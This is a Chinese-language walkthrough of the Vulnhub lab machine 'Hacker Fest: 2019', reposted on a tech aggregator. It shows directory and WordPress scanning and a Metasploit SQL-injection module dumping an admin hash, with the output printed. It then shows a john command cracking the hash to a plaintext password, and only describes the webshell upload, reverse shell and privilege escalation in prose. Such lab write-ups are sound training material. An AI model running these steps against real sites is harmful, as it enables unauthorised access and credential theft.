经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
Hacker Fest: 2019 Vulnhub Walkthrough - APT-101
来源:cnblogs  作者:APT-101  时间:2019/10/15 11:15:19  对本文有异议

靶机地址:

https://www.vulnhub.com/entry/hacker-fest-2019,378/

主机扫描:

 

FTP尝试匿名登录

 

应该是WordPress的站点

进行目录扫描:

python3 dirsearch.py http://10.10.203.17/ -e html,json,php

 

此外还有一个phpmyadmin

http://10.10.203.17/phpmyadmin/index.php

使用wpscan扫描检测插件漏洞

wpscan --url http://10.10.203.17

 

msf5 > use auxiliary/admin/http/wp_google_maps_sqli

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 10.10.203.17
rhosts => 10.10.203.17

msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
[*] Running module against 10.10.203.17

[*] 10.10.203.17:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191014174707_default_10.10.203.17_wp_google_maps.j_470411.bin
[+] 10.10.203.17:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) >

 

密码hash破解

john --wordlist=/usr/share/wordlists/rockyou.txt hash

kittykat1

 

http://10.10.203.17/wp-admin/

安装ubh插件,进行上传文件

 

本地监听,访问反弹shell

这里有两个思路:

1是通过webshell切换到webmaster用户

2是直接通过远程ssh登录系统

 

进行提权

 

OVER!

 

原文链接:http://www.cnblogs.com/hack404/p/11675756.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号